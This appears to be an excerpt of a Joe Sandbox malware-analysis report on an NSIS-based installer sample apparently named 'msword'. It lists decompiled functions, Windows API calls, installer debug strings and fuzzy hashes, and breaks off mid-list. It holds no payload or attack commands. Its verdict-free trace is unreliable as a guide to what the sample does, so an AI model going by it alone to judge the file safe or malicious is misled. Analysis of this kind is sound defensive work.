CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename failed: %s, xrefs: 0040194B
Rename: %s, xrefs: 004018F8
Sleep(%d), xrefs: 0040169D
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
SetFileAttributes: "%s":%08X, xrefs: 0040177B
BringToFront, xrefs: 004016BD
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: "%s" (%d), xrefs: 004017BF
detailprint: %s, xrefs: 00401679
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

.DEFAULT\Control Panel\International, xrefs: 00405999
.exe, xrefs: 00405A3D
@rD, xrefs: 00405965
RichEd32, xrefs: 00405BA8
RichEdit20A, xrefs: 00405BB6, 00405BBB
RichEdit, xrefs: 00405BC4
RichEd20, xrefs: 00405B9D
@%F, xrefs: 004059F6
_Nb, xrefs: 00405AD1
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
B%F, xrefs: 00405A1F

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user cancel, xrefs: 00401B93
WarsFeltMadridFarmsPee, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0
File: wrote %d to "%s", xrefs: 00401BD0
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
API String ID: 4286501637-4051260161
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
soft, xrefs: 00403675
Inst, xrefs: 0040366C
Error launching installer, xrefs: 004035D7
Null, xrefs: 0040367E

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

P1B, xrefs: 004033A9
X1C, xrefs: 0040343C
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00721330), ref: 00402387

Strings

WarsFeltMadridFarmsPee, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
API String ID: 1459762280-1231270740
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00721330), ref: 00402387

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WarsFeltMadridFarmsPee, xrefs: 00402770
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
